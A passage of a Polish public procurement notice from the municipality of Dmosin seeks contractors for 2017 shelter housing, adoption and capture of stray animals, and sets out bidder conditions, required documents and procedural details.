4. Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości określonej w istotnych postanowieniach  umowy w sprawie zamówienia publicznego. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności. 
5. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.



<br /><br /><b>II.5) Główny kod CPV: </b>98380000-0<br /><b> Dodatkowe kody CPV:</b>85200000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że posiada i przedstawi dokument: 
- zezwolenie na świadczenie usług w zakresie prowadzenia schronisk dla bezdomnych zwierząt zgodnie z art. 7 ust. 1 pkt 4 ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r.(tj. Dz. U. z 2016 r , poz. 250 ze zm. 
lub
- zezwolenie Powiatowego Inspektoratu Weterynarii, właściwego miejscowo dla Wykonawcy wydanie w formie decyzji o objęciu nadzoru inspekcji weterynaryjnej, wprowadzenie do rejestru Powiatowego Lekarza Weterynarii i nadania weterynaryjnego numeru identyfikacyjnego art. 5 ust. 1 pkt. 2 i art.5 ust. 2 ustawy z dnia 11.03.2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. 2014, poz. 1539 ze zm.).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega  
z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
             Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z opłacaniem podatków, opłat, albo, że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, z zachowaniem powyższego terminu. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów potwierdzających powyższe okoliczności, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.
Dokumenty składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega 
z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
                    Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne albo, że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, z zachowaniem powyższego terminu. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów potwierdzających powyższe okoliczności, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.
Dokumenty składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)  koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca jest
            wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim             
            Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania, t.j. - zezwolenie na świadczenie usług w zakresie prowadzenia schronisk dla bezdomnych zwierząt zgodnie z art. 7 ust. 1 pkt 4 ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r.(tj. Dz. U. z 2016 r , poz. 250 ze zm.)
lub
- zezwolenie Powiatowego Lekarza Weterynarii, właściwego miejscowo dla Wykonawcy wydanie w formie decyzji o objęciu nadzoru inspekcji weterynaryjnej, wprowadzenie do rejestru Powiatowego Lekarza Weterynarii i nadania weterynaryjnego numeru identyfikacyjnego art. 5 ust. 1 pkt. 2 i art.5 ust. 2 ustawy z dnia 11.03.2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. 2014, poz. 1539 ze zm.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Hotelowanie zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt w okresie od 01.01.2017r. do 31.12.2017r.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Hotelowanie zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt w okresie od 01.01.2017r. do 31.12.2017r.
Zakresem zamówienia jest świadczenie usług polegających na:
a)	przejęcie przez Wykonawcę opieki nad bezdomnymi zwierzętami znajdującymi się w Schronisku - Hotel Dla Zwierząt i Ptactwa Domowego Longin Siemiński, Gabinet weterynaryjny, Schronisko, Centrum Rehabilitacyjno-Szkoleniowo-Adopcyjne, 92-411 Łódź, ul. Kosodrzewiny 56 lok.2 w ilości 101 szt.  i w schronisku w Zgierzu ul. Urocza 9 w ilości 2 szt.  oraz ich przewiezienie do schroniska prowadzonego przez Wykonawcę na jego koszt i przy użyciu własnych środków transportowych Wykonawcy. Wykaz zwierząt w załączniku nr 8 do SIWZ
b)	zapewnienie wyżywienia, opieki (w tym weterynaryjnej) nad bezdomnymi zwierzętami pochodzącymi z terenu gminy Dmosin w okresie obowiązywania umowy.
c)	 prowadzenie aktywnych działań zmierzających do oddania jak największej ilości hotelowanych zwierząt do adopcji.
Szczegółowy przedmiot zamówienia dla część I:
1.	przejęcie oraz przetransportowanie na swój koszt wszystkich wyłapanych zwierząt z terenu Gminy Dmosin aktualnie znajdujących się pod opieką firmy Hotel Dla Zwierząt i Ptactwa Domowego Longin Siemiński, Gabinet Weterynaryjny, Schronisko, Centrum Rehabilitacyjno-Szkoleniowo-Adopcyjne z siedzibą ul. Kosodrzewiny 56 lok. 2, 92-411 Łódź , filia Wojtyszki 18 ok. 101 szt. i w schronisku w Zgierzu , ul. Urocza, 9, 95-100 Zgierz w ilości 2 szt., do schroniska prowadzonego przez Wykonawcę oraz sprawowanie opieki nad tymi zwierzętami w okresie obowiązywania umowy. Sprawdzenie, w dniu odbioru zwierząt, czy wszystkie zwierzęta są zaczipowane i w przypadku braku czipu wszczepienie nowego na koszt Wykonawcy.
2.	prowadzenie ewidencji zwierząt w sposób umożliwiający identyfikację zwierząt. Ewidencja zwierząt winna zawierać minimum dwie fotografie zwierzęcia przedstawiające  całe zwierzę w ujęciu bocznym (prawa i lewa strona ciała), wraz z opisem zwierzęcia zawierającym w szczególności rasę, płeć, maść oraz wielkość oraz numer czipa.
3.	Prowadzenie działań adopcyjnych zwierząt z terenu gminy Dmosin poprzez poszukiwania chętnych do przyjęcia zwierząt i oddanie do adopcji zwierząt,
4.	bezzwłoczne informowanie Zamawiającego o przekazaniu zwierzęcia do adopcji lub jego zgonie,
5.	sprawowanie całodobowej opieki nad zwierzętami, w zakres której wchodzi także wyżywienie, schronienie, 
6.	zapewnienie pomieszczeń boksów do przetrzymywania zwierząt w odpowiednich warunkach, zgodnie z obowiązującymi przepisami prawa w tym:zabezpieczenie zwierząt przed negatywnym wpływem czynników atmosferycznych,
      takich jak: deszcz, śnieg, wiatr, szkodliwe działanie słońca, zapewnienia zwierzętom    
      odpowiedniego oświetlenia, oddzielenie zwierząt agresywnych od zwierząt 
      nieprzejawiających takiej cechy;
7.	sprawowanie opieki weterynaryjnej, polegającej na:
a)	15- dniowej kwarantannie,
b)	odpchleniu i odrobaczeniu,
c)	szczepieniu i leczeniu,
d)	badaniach profilaktycznych
e)	leczeniu zwierząt w przypadku ich zachorowania, oraz w uzasadnionych przypadkach poddanie zwierząt eutanazji.
8.  Wykonawca zobowiązany jest do:
1) Przestrzegania przepisów prawa zawartych w:
a) ustawie z dnia 21 sierpnia 1997r. o ochronie zwierząt (Dz. U. z 2013r. poz. 856 z
późniejszymi zmianami),
b) ustawie z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób
zakaźnych zwierząt (Dz. U. z 2014r. poz. 1539 z późniejszymi zmianami),
c) ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(Dz. U. z 2016r. poz. 250 z póź.zm.),
d) we właściwych rozporządzeniach wydanych na podstawie ww. ustaw,
2) zachowania bezpieczeństwa, porządku i czystości podczas realizacji przedmiotu umowy,
3) powierzenia wykonywania obowiązków i zadań objętych przedmiotem zamówienia wyłącznie osobom posiadającym wymagane do tego kwalifikacje i uprawnienia 
oraz zaopatrzenia ich w odpowiedni sprzęt zapewniający bezpieczeństwo ludzi i zwierząt,
4) zapewnienia we własnym zakresie zaplecza organizacyjnego, personalnego i narzędzi
koniecznych do wykonywania przedmiotu umowy,
5) Wykonawca oświadcza i zapewnia Zamawiającego, że posiada zezwolenie 
na prowadzenie działalności w zakresie objętym niniejszą umową i koniecznym 
do prowadzenia działalności w sferze ochrony nad bezdomnymi zwierzętami, zgodnie 
z art. 7 ust. 1 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku 
w gminach oraz zobowiązuje się do posiadania i uaktualniania powyższego zezwolenia przez cały okres realizacji umowy. W przypadku, gdy zezwolenie traci moc obowiązującą, w trakcie trwania niniejszej umowy Wykonawca obowiązany jest do uzyskania aktualnego zezwolenia najpóźniej w dniu poprzedzającym dzień wygaśnięcia dotychczasowych uprawnień.
6) Zamawiający zobowiązany jest do natychmiastowego poinformowania Wykonawcy 
w przypadku wystąpienia objawów choroby zakaźnej, zwalczanej z urzędu na swoim terenie. Analogiczny obowiązek ciąży na Wykonawcy wobec Zamawiającego.
7) Za wszelkie wypadki i szkody oraz ich następstwa wynikłe w związku z realizacją umowy odpowiada wyłącznie Wykonawca.
8) Za działania lub zaniechania swoich pracowników, współpracowników, podwykonawców uczestniczących w wykonywaniu przedmiotu umowy Wykonawca odpowiada tak, jak za działania lub zaniechania własne.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98380000-0, 85200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Ilićś przeprowadzonych adopcji bezdomnych zwierząt w okresie każdego kwartału</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Wyłapywanie oraz zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakresem zamówienia jest świadczenie usług polegających na:
d)	odłapywaniu, oraz przewóz do schroniska dla bezdomnych zwierząt odłapanych bezdomnych zwierząt z terenu gminy Dmosin i umieszczanie ich w schronisku,
e)	zapewnienie wyżywienia, opieki (w tym weterynaryjnej) nad bezdomnymi zwierzętami pochodzącymi z terenu gminy Dmosin w okresie obowiązywania umowy.
Szczegółowy przedmiot zamówienia :
1.  wyłapanie, w czasie nie dłuższym niż 10 godzin (w czasie wskazanym w ofercie Wykonawcy) od przyjęcia telefonicznego zgłoszenia, zwierzęcia bezdomnego z terenu Gminy Dmosin wraz z jego transportem do schroniska i zaczipowaniem. Szacuje się, że w okresie do 31.12.2017r 
do odłapania będzie maksymalnie 10 zwierząt,
2. prowadzenie ewidencji bezdomnych zwierząt, wyłapanych na terenie gminy Dmosin, w sposób umożliwiający ich identyfikację polegający w szczególności na opisaniu danego zwierzęcia (rasa, płeć, maść, wielkość i nr czip) wraz z podaniem daty jego przyjęcia oraz sporządzenie, w dniu przyjęcia do Schroniska a także dokumentacji fotograficznej zwierzęcia 3. po odłapaniu zwierzęcia i umieszczeniu w schronisku przesyłanie w wersji papierowej lub drogą elektroniczną co najmniej dwóch fotografii przedstawiających  całe zwierzę w ujęciu bocznym (prawa i lewa strona ciała), wraz z opisem zwierzęcia zawierającym w szczególności rasę, płeć, maść oraz wielkość i nr czipa,
